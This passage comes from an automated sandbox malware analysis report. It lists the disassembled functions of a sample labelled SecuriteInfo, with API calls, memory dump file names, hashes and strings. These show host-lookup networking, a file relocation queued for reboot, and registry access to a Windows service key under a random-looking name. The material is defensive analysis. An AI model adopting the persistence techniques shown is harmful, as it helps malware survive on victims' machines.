                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 494bf9fe39186a2a78ec4bbb0bdca94e90cb4b291b8dce51156779de2000f286
                                                                    • Instruction ID: 400b1e58490ddcf2063765e763a83b08645e1e3038df48538296bbb7188f4a95
                                                                    • Opcode Fuzzy Hash: 494bf9fe39186a2a78ec4bbb0bdca94e90cb4b291b8dce51156779de2000f286
                                                                    • Instruction Fuzzy Hash: 78113DB5500219BFEB009F64DCC4CAB3BACEB443A47158176F909D6261D775DD908B61
                                                                    Function 0040A5CC Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 8e18e9a19f1967efdafd378f889d13701e875779bd51959382322cbc3e7b8a29
                                                                    • Instruction ID: 8d5ae122f894cc815d0cb8172715380624800878d2253dd041543a480c54bfa8
                                                                    • Opcode Fuzzy Hash: 8e18e9a19f1967efdafd378f889d13701e875779bd51959382322cbc3e7b8a29
                                                                    • Instruction Fuzzy Hash: 92114FB1500318BFEB009F64DCC4CAB3BACEB453A87198536F908D7261DB35DD908B65
                                                                    Function 0040A9D7 Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 07288077791e5e33b855acb68660ad7281809b5a8302493335e4f4f1072645fd
                                                                    • Instruction ID: 18df83a50d74aa61292881a3068044ec1e36daab3a77c84132ec3e6df7cf19ae
                                                                    • Opcode Fuzzy Hash: 07288077791e5e33b855acb68660ad7281809b5a8302493335e4f4f1072645fd
                                                                    • Instruction Fuzzy Hash: 04113DB1600219BFEB009F64DDC4CAB3BACEB443A87158036F908D62A1D735DD94CB65
                                                                    Function 0040C255 Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: b5ec76156d1e95e976921df7b4dc76adbae61f63f9323eff8a4a8a7ab284d421
                                                                    • Instruction ID: 0ef99c5fc0bafe760d386d7421f25e0da4223d45fd07e147cbc2e89a7ef28672
                                                                    • Opcode Fuzzy Hash: b5ec76156d1e95e976921df7b4dc76adbae61f63f9323eff8a4a8a7ab284d421
                                                                    • Instruction Fuzzy Hash: 03114CB591425DBFEB009FA4DCC4CAB3BACEB443A4715817AF908D72A1DB74DD808B64
                                                                    Function 0040BEA2 Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 8114b808eb6457c2da1cba9f100ab21ddf80d99eb743dfd380f1022a9c745f4c
                                                                    • Instruction ID: ac6a92a81bd9858db20a7d40003e8a81ff00761e9a83ea72e867e2fc6fe511bc
                                                                    • Opcode Fuzzy Hash: 8114b808eb6457c2da1cba9f100ab21ddf80d99eb743dfd380f1022a9c745f4c
                                                                    • Instruction Fuzzy Hash: 77114CB550421DBFEB009F64DCC4CAB3BACEB443A47158436FA08D72A2D734DD808BA4
                                                                    Function 0040C752 Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 6a8e787f510737941c8ac031b9e449823c5f295378c209042514e7afa1060de8
                                                                    • Instruction ID: 56c9bf6ebd49b2cfcf1af41c4fbd591865a9760268c6c2c5cd54063d8e8c775a
                                                                    • Opcode Fuzzy Hash: 6a8e787f510737941c8ac031b9e449823c5f295378c209042514e7afa1060de8
                                                                    • Instruction Fuzzy Hash: 25114CB551021ABFEB009FA4DCC4CAB7BACEB443A4715813AF909D7261DB34DD808BA4
                                                                    Function 100057D0 Relevance: 9.1, APIs: 6, Instructions: 51stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
                                                                    • String ID:
                                                                    • API String ID: 850376632-0
                                                                    • Opcode ID: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction ID: 0b6569184308d5092b71901e17deb8d11e374f996cf725eb53732de4d7b5148e
                                                                    • Opcode Fuzzy Hash: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction Fuzzy Hash: 3D01757260022DAEFB109BA4DC49F9A7BACEB043C5F10847AEB05F5094EF71AA458B54
                                                                    Function 00410F2A Relevance: 9.0, APIs: 6, Instructions: 36fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00410F47
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00410F55
                                                                    • GetTickCount.KERNEL32 ref: 00410F5B
                                                                    • wsprintfA.USER32 ref: 00410F75
                                                                    • MoveFileA.KERNEL32(?,?), ref: 00410F8C
                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00410F9D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                    • String ID:
                                                                    • API String ID: 830686190-0
                                                                    • Opcode ID: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction ID: 9f06803c1ffaaaa31e9d9007a62f372198ec7d6cfd6c9242bac5ba9a813fd8f0
                                                                    • Opcode Fuzzy Hash: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction Fuzzy Hash: 50F091B680022CEBEB109B94CD8DED7777CEB19341F400192F755D2065D674AA94CFA4
                                                                    Function 10006A71 Relevance: 8.9, APIs: 7, Instructions: 117memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000004,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AAC
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006ABC
                                                                    • GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,10004EE2,?), ref: 10006ACD
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,10004EE2,?), ref: 10006AD4
                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AF8
                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006B07
                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,10004EE2,?), ref: 10006B18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2335822491-0
                                                                    • Opcode ID: fda733b7b8d0eefcb2523fafa16eeaad609332357a054895f0cb226edc32ce91
                                                                    • Instruction ID: 9749948cec9ded70f1cb0785933e75aede6f1033f69415ccdb1ca8143126ce73
                                                                    • Opcode Fuzzy Hash: fda733b7b8d0eefcb2523fafa16eeaad609332357a054895f0cb226edc32ce91
                                                                    • Instruction Fuzzy Hash: 503148B1600305BFE714DBA9CC85F6A7BA9EF487A4F204429F605D7285DBB0E940CBA4
                                                                    Function 10008B5E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectory_access
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 2692904705-3753134293
                                                                    • Opcode ID: 954fdeec0aa1be0a0496a17a2e9b9ec5d6852a07f1792e650cf2c758b9485b67
                                                                    • Instruction ID: e75c7dfe0287a2a9ee950ba91ede74e14394efcbff4014e2d18e1f21b8cfdc79
                                                                    • Opcode Fuzzy Hash: 954fdeec0aa1be0a0496a17a2e9b9ec5d6852a07f1792e650cf2c758b9485b67
                                                                    • Instruction Fuzzy Hash: 2401D6F78002687BFB20D3B4DC45FCB77ACEB86791F1101A6E781A2089D6B4A6C58795
                                                                    Function 10009E13 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35stringregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(00000000,SYSTEM\CurrentControlSet\Services\,75921760), ref: 10009E40
                                                                    • strcat.MSVCRT(00000000,Rsjshd fzfgkqcm,00000000,SYSTEM\CurrentControlSet\Services\,75921760), ref: 10009E51
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,100096BB,?,?,?,75921760), ref: 10009E70
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\, xrefs: 10009E3A
                                                                    • Rsjshd fzfgkqcm, xrefs: 10009E4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Openstrcatstrcpy
                                                                    • String ID: Rsjshd fzfgkqcm$SYSTEM\CurrentControlSet\Services\
                                                                    • API String ID: 883322207-3836574047
                                                                    • Opcode ID: 44a42bc4adcd3ea2217754a50fa90f40591461bb4abc7fb8ba3c25a47b8a0cf6
                                                                    • Instruction ID: bb402566a885a102546ad197f213bba67bf5148c6e8ca3191bc1c33e99d45995
                                                                    • Opcode Fuzzy Hash: 44a42bc4adcd3ea2217754a50fa90f40591461bb4abc7fb8ba3c25a47b8a0cf6
                                                                    • Instruction Fuzzy Hash: FAF08276D0825C7AEB50D6A4CC4AFE977BCD714700F1005F5B385F10C1EAF0AAC98A51
                                                                    Function 0040F286 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 33networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1A3
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1B5
                                                                      • Part of subcall function 0040F177: wsprintfA.USER32 ref: 0040F25B
                                                                    • gethostname.WS2_32(?,?), ref: 0040F2C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
